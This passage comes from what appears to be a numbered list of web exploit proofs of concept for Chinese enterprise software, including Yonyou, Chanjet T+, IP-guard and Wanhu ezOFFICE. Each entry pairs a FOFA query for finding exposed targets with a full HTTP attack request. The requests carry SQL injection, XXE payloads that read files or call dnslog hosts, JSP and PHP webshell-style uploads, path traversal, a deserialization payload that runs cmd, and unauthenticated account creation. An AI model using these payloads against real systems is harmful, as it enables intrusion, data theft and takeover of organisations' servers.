POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version= NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
  <soapenv:Header/>
  <soapenv:Body>
    <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
    </ser:getUserNameById>
  </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the packet to the target; it executes the command and writes the specified string into the specified file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full packet
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The sql parameter is base64: c2VsZWN0IDEsdXNlcigpLDM= decodes to select 1,user(),3, so the exported sheet carries the MySQL user.

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then fetch the marker file written by the injected echo:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetOSpById xmlns="http://tempuri.org/">
<sId>1';waitfor delay '0:0:5'--+</sId>
</GetOSpById>
</soap:Body>
</soap:Envelope>

A response delayed by about 5 seconds confirms the injection.

65. 优卡特脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456 / 123456 has been created without any authentication.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9 if the host is vulnerable.

67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
newdocId and the multipart filename set the name of the written file, dir sets the directory it is written to, and fileType sets its extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp.
68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The ;.js suffix is a path parameter: the request is matched as a static .js resource by any filter that looks at the URL, but the container still dispatches it to wf_printnum.jsp. A response delayed by about 5 seconds confirms the injection.

69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
